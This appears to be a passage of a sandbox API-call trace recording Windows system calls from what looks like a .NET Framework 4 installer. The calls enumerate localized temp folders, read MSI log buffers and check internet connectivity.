FAILURE | 0x00000002 | |
| 07:44:45,820 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:45,820 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:45,860 | 504 | NtReadFile |
Buffer => \x00c\x00o\x00m\x00p\x00l\x00e\x00t\x00e\x00.\x00 \x00D\x00u\x00m\x00p\x00i\x00n\x00g\x00 \x00D\x00i\x00r\x00e\x00c\x00t\x00o\x00r\x00y\x00 \x00t\x00a\x00b\x00l\x00e\x00.\x00.\x00.\x00
\x00
\x00M\x00S\x00I\x00 \x00(\x00s\x00)\x00 \x00(\x002\x000\x00:\x00A\x00C\x00)\x00 \x00[\x002\x000\x00:\x003\x007\x00:\x005\x004\x00:\x000\x004\x008\x00]\x00:\x00 \x00N\x00o\x00t\x00e\x00:\x00 \x00t\x00a\x00r\x00g\x00e\x00t\x00 \x00p\x00a\x00t\x00h\x00s\x00 \x00s\x00u\x00b\x00j\x00e\x00c\x00t\x00 \x00t\x00o\x00 \x00c\x00h\x00a\x00n\x00g\x00e\x00 \x00(\x00v\x00i\x00a\x00 \x00c\x00u\x00s\x00t\x00o\x00m\x00 \x00a\x00c\x00t\x00i\x00o\x00n\x00s\x00 \x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,991 | 504 | NtReadFile |
Buffer => F\x00i\x00l\x00e\x00`\x00,\x00 \x00`\x00F\x00e\x00a\x00t\x00u\x00r\x00e\x00`\x00 \x00W\x00H\x00E\x00R\x00E\x00 \x00`\x00F\x00e\x00a\x00t\x00u\x00r\x00e\x00_\x00`\x00 \x00=\x00 \x00`\x00F\x00e\x00a\x00t\x00u\x00r\x00e\x00`\x00 \x00A\x00N\x00D\x00 \x00`\x00E\x00x\x00t\x00e\x00n\x00s\x00i\x00o\x00n\x00`\x00.\x00`\x00C\x00o\x00m\x00p\x00o\x00n\x00e\x00n\x00t\x00_\x00`\x00 \x00=\x00 \x00`\x00C\x00o\x00m\x00p\x00o\x00n\x00e\x00n\x00t\x00`\x00 \x00A\x00N\x00D\x00 \x00`\x00C\x00o\x00m\x00p\x00o\x00n\x00e\x00n\x00t\x00`\x00.\x00`\x00K\x00e\x00y\x00P\x00a\x00t\x00h\x00`\x00 \x00=\x00 \x00`\x00F\x00i\x00l\x00e\x00`\x00.\x00`\x00F\x00i\x00l\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:46,181 | 504 | NtReadFile |
Buffer => r\x006\x004\x00 \x00
\x00
\x00M\x00S\x00I\x00 \x00(\x00s\x00)\x00 \x00(\x002\x000\x00:\x00A\x00C\x00)\x00 \x00[\x002\x000\x00:\x003\x007\x00:\x005\x004\x00:\x005\x003\x008\x00]\x00:\x00 \x00N\x00o\x00t\x00e\x00:\x00 \x001\x00:\x00 \x002\x002\x000\x005\x00 \x002\x00:\x00 \x00 \x003\x00:\x00 \x00O\x00D\x00B\x00C\x00D\x00r\x00i\x00v\x00e\x00r\x00 \x00
\x00
\x00M\x00S\x00I\x00 \x00(\x00s\x00)\x00 \x00(\x002\x000\x00:\x00A\x00C\x00)\x00 \x00[\x002\x000\x00:\x003\x007\x00:\x005\x004\x00:\x005\x003\x008\x00]\x00:\x00 \x00N\x00o\x00t\x00e\x00:\x00 \x001\x00:\x00 \x002\x002\x002\x008\x00 \x002\x00:\x00 \x00 \x003\x00:\x00 \x00O\x00D\x00B\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:46,321 | 504 | NtReadFile |
Buffer => p\x00e\x00r\x00t\x00y\x00(\x00S\x00)\x00:\x00 \x00P\x00e\x00r\x00s\x00o\x00n\x00a\x00l\x00F\x00o\x00l\x00d\x00e\x00r\x00 \x00=\x00 \x00C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00
\x00
\x00P\x00r\x00o\x00p\x00e\x00r\x00t\x00y\x00(\x00S\x00)\x00:\x00 \x00N\x00e\x00t\x00H\x00o\x00o\x00d\x00F\x00o\x00l\x00d\x00e\x00r\x00 \x00=\x00 \x00C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:46,331 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:46,341 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xf0\xc3\x92\xfe\xe2\x91\xcf\x01@\x15\x0c3\xe3\x91\xcf\x01@\x15\x0c3\xe3\x91\xcf\x01@\x15\x0c3\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00T\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00I\x00C\x00R\x00O\x00S\x00~\x001\x00.\x003\x000\x003\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 \x00.\x00N\x00E\x00T\x00 \x00F\x00r\x00a\x00m\x00e\x00w\x00o\x00r\x00k\x00 \x004\x00 \x00S\x00e\x00t\x00u\x00p\x00_\x004\x00.\x000\x00.\x003\x000\x003\x001\x009\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\xd0\x9b\xb9\x0e\xe2\x91\xcf\x01 sU@\xe2\x91\xcf\x01 sU@\xe2\x91\xcf\x01 sU@\xe2\x91\xcf\x01\xfa\xa1\x03\x00\x00\x00\x00\x00\x00\xb0\x03\x00\x00\x00\x00\x00 \x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00 |
SUCCESS | 0x00000000 | |
| 07:44:46,341 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:46,431 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:46,441 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xc3\x92\xfe\xe2\x91\xcf\x01@\x15\x0c3\xe3\x91\xcf\x01@\x15\x0c3\xe3\x91\xcf\x01@\x15\x0c3\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00h\x00\x00\x00\x00\x00\x00\x00\xc09V\x12\xe3\x91\xcf\x01\xb08Eg\xe3\x91\xcf\x01\xe0d_\x12\xe3\x91\xcf\x01\xe0d_\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x000\x002\x005\x00r\x00h\x00\x00\x00\x00\x00\x00\x00\xe0d_\x12\xe3\x91\xcf\x01\xe0\xbfFg\xe3\x91\xcf\x01\xd0\x08g\x12\xe3\x91\xcf\x01\xd0\x08g\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:46,451 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:46,531 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1025\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:46,531 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc09V\x12\xe3\x91\xcf\x01\xb08Eg\xe3\x91\xcf\x01\xe0d_\x12\xe3\x91\xcf\x01\xe0d_\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00P\xcfZ\x12\xe3\x91\xcf\x01P\xcfZ\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01P\xcfZ\x12\xe3\x91\xcf\x01\x8f\x1d\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xb0\xdd]\x12\xe3\x91\xcf\x01\xb0\xdd]\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xb0\xdd]\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:46,531 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:46,531 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:46,632 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:46,632 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:46,632 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:46,632 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:46,632 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:46,712 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1028\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:46,712 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0d_\x12\xe3\x91\xcf\x01\xe0\xbfFg\xe3\x91\xcf\x01\xd0\x08g\x12\xe3\x91\xcf\x01\xd0\x08g\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00p\xfac\x12\xe3\x91\xcf\x01p\xfac\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01p\xfac\x12\xe3\x91\xcf\x01\xa5\x18\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xa0\x81e\x12\xe3\x91\xcf\x01\xa0\x81e\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xa0\x81e\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:46,712 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:46,712 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:46,792 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1029\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:46,792 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\x08g\x12\xe3\x91\xcf\x01\x10GHg\xe3\x91\xcf\x01\xc0\xacn\x12\xe3\x91\xcf\x01\xc0\xacn\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\x00\x90h\x12\xe3\x91\xcf\x01\x00\x90h\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\x00\x90h\x12\xe3\x91\xcf\x01\x8e\x0e\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\x00\x90h\x12\xe3\x91\xcf\x01\x00\x90h\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\x00\x90h\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:46,792 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:46,792 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:46,872 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1030\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:46,872 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\xacn\x12\xe3\x91\xcf\x01@\xceIg\xe3\x91\xcf\x01 \xbbq\x12\xe3\x91\xcf\x01 \xbbq\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\xc0\xacn\x12\xe3\x91\xcf\x01\xc0\xacn\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\xf03p\x12\xe3\x91\xcf\x01\xf2\x0c\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xf03p\x12\xe3\x91\xcf\x01\xf03p\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xf03p\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:46,872 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:46,872 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:46,952 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1031\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:46,952 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xbbq\x12\xe3\x91\xcf\x01@\xceIg\xe3\x91\xcf\x01\x80\xc9t\x12\xe3\x91\xcf\x01\x80\xc9t\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00PBs\x12\xe3\x91\xcf\x01PBs\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01PBs\x12\xe3\x91\xcf\x01[ \x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00PBs\x12\xe3\x91\xcf\x01PBs\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01PBs\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:46,952 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:46,952 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,032 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1032\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,032 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\xc9t\x12\xe3\x91\xcf\x01pUKg\xe3\x91\xcf\x01@\xe6z\x12\xe3\x91\xcf\x01@\xe6z\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\x10_y\x12\xe3\x91\xcf\x01\x10_y\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\x10_y\x12\xe3\x91\xcf\x01\xac"\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\x10_y\x12\xe3\x91\xcf\x01\x10_y\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\x10_y\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,032 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,032 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,112 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1033\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,112 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xe6z\x12\xe3\x91\xcf\x01pUKg\xe3\x91\xcf\x01\xa0\xf4}\x12\xe3\x91\xcf\x01\xa0\xf4}\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00pm|\x12\xe3\x91\xcf\x01pm|\x12\xe3\x91\xcf\x01\x00\xcc#\xd7G\xbb\xca\x01pm|\x12\xe3\x91\xcf\x01t\x0c\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xa0\xf4}\x12\xe3\x91\xcf\x01\xa0\xf4}\x12\xe3\x91\xcf\x01\x00\x1a\xadG\xfe\xc6\xca\x01\xa0\xf4}\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,112 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,112 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,192 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1035\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,192 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xf4}\x12\xe3\x91\xcf\x01\x00\xebOg\xe3\x91\xcf\x010\x8a\x82\x12\xe3\x91\xcf\x010\x8a\x82\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\x00\x03\x81\x12\xe3\x91\xcf\x01\x00\x03\x81\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\x00\x03\x81\x12\xe3\x91\xcf\x01v\x0e\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x000\x8a\x82\x12\xe3\x91\xcf\x010\x8a\x82\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x010\x8a\x82\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,192 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,192 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,272 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1036\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,272 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x8a\x82\x12\xe3\x91\xcf\x010rQg\xe3\x91\xcf\x01\x90\x98\x85\x12\xe3\x91\xcf\x01\x90\x98\x85\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00`\x11\x84\x12\xe3\x91\xcf\x01`\x11\x84\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01`\x11\x84\x12\xe3\x91\xcf\x01\xc6 \x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\x90\x98\x85\x12\xe3\x91\xcf\x01\x90\x98\x85\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\x90\x98\x85\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,272 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,272 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,353 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1037\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,353 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\x1f\x87\x12\xe3\x91\xcf\x01`\xf9Rg\xe3\x91\xcf\x01\xf0\xa6\x88\x12\xe3\x91\xcf\x01\xf0\xa6\x88\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\xc0\x1f\x87\x12\xe3\x91\xcf\x01\xc0\x1f\x87\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\xc0\x1f\x87\x12\xe3\x91\xcf\x01\xc3\x1a\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xf0\xa6\x88\x12\xe3\x91\xcf\x01\xf0\xa6\x88\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xf0\xa6\x88\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,353 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,353 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
